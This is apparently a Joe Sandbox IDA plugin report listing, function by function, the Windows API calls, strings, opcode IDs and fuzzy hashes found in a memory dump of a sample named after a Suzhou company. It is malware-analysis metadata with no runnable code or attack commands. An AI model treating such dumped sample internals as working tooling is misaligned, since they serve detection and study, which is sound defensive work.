                                                                                                    • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                    • Opcode Fuzzy Hash: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                                                    • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                    APIs
                                                                                                    • wcschr.MSVCRT ref: 00413972
                                                                                                    • wcscpy.MSVCRT ref: 00413982
                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                    • wcscpy.MSVCRT ref: 004139D1
                                                                                                    • wcscat.MSVCRT ref: 004139DC
                                                                                                    • memset.MSVCRT ref: 004139B8
                                                                                                      • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                      • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                    • memset.MSVCRT ref: 00413A00
                                                                                                    • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                    • wcscat.MSVCRT ref: 00413A27
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                    • String ID: \systemroot
                                                                                                    • API String ID: 4173585201-1821301763
                                                                                                    • Opcode ID: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                                    • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                    • Opcode Fuzzy Hash: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                                    • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wcscpy
                                                                                                    • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                    • API String ID: 1284135714-318151290
                                                                                                    • Opcode ID: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                                                    • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                    • Opcode Fuzzy Hash: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                                                    • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                    • String ID: 0$6
                                                                                                    • API String ID: 4066108131-3849865405
                                                                                                    • Opcode ID: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                    • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                    • Opcode Fuzzy Hash: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                    • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004082EF
                                                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                    • memset.MSVCRT ref: 00408362
                                                                                                    • memset.MSVCRT ref: 00408377
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$ByteCharMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 290601579-0
                                                                                                    • Opcode ID: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                                                                                    • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                    • Opcode Fuzzy Hash: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                                                                                    • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                    APIs
                                                                                                    • memchr.MSVCRT ref: 00444EBF
                                                                                                    • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                    • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                    • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                    • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                                    • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                                    • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                                    • memset.MSVCRT ref: 0044505E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memchrmemset
                                                                                                    • String ID: PD$PD
                                                                                                    • API String ID: 1581201632-2312785699
                                                                                                    • Opcode ID: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                                    • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                    • Opcode Fuzzy Hash: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                                    • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                    APIs
                                                                                                    • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                    • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                    • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                    • GetParent.USER32(?), ref: 00409FA5
                                                                                                    • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 2163313125-0
                                                                                                    • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                    • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                    • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                    • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3592753638-3916222277
                                                                                                    • Opcode ID: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                                                    • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                    • Opcode Fuzzy Hash: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                                                    • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040A47B
                                                                                                    • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                    • wcslen.MSVCRT ref: 0040A4BA
                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                    • wcslen.MSVCRT ref: 0040A4E0
                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpywcslen$_snwprintfmemset
                                                                                                    • String ID: %s (%s)$YV@
                                                                                                    • API String ID: 3979103747-598926743
                                                                                                    • Opcode ID: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                                    • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                    • Opcode Fuzzy Hash: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                                    • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                    APIs
                                                                                                    • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                                    • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadMessageProc
                                                                                                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                    • API String ID: 2780580303-317687271
                                                                                                    • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                    • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                    • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                    • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                                                                                                    • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                                                                                                    • wcslen.MSVCRT ref: 0040A6B1
                                                                                                    • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                    • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                                                                                                    • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                    • String ID: Unknown Error$netmsg.dll
                                                                                                    • API String ID: 2767993716-572158859
                                                                                                    • Opcode ID: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                                                    • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                    • Opcode Fuzzy Hash: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                                                    • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                    APIs
                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                    • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                    • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                    • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                      • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                    • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                    • API String ID: 3176057301-2039793938
                                                                                                    • Opcode ID: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                                                    • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                    • Opcode Fuzzy Hash: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                                                    • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • out of memory, xrefs: 0042F865
                                                                                                    • database %s is already in use, xrefs: 0042F6C5
                                                                                                    • database is already attached, xrefs: 0042F721
                                                                                                    • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                    • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                    • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                    • unable to open database: %s, xrefs: 0042F84E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpymemset
                                                                                                    • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                    • API String ID: 1297977491-2001300268
                                                                                                    • Opcode ID: b87818fa112a0acc8a66a9ae252063e0b2e26e7fac12933c278b7e571d5e68ae
                                                                                                    • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                    • Opcode Fuzzy Hash: b87818fa112a0acc8a66a9ae252063e0b2e26e7fac12933c278b7e571d5e68ae
                                                                                                    • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB3F
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB5B
                                                                                                    • memcpy.MSVCRT(?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB80
                                                                                                    • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB94
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC17
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,004126A8,00000000), ref: 0040EC21
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC59
                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                    • String ID: ($d
                                                                                                    • API String ID: 1140211610-1915259565
                                                                                                    • Opcode ID: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                                                    • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                    • Opcode Fuzzy Hash: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                                                    • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                    APIs
                                                                                                    • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                    • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                    • GetLastError.KERNEL32 ref: 004178FB
                                                                                                    • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$ErrorLastLockSleepUnlock
                                                                                                    • String ID:
                                                                                                    • API String ID: 3015003838-0
                                                                                                    • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                    • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                    • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                    • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00407E44
                                                                                                    • memset.MSVCRT ref: 00407E5B
                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                    • wcscpy.MSVCRT ref: 00407F10
                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
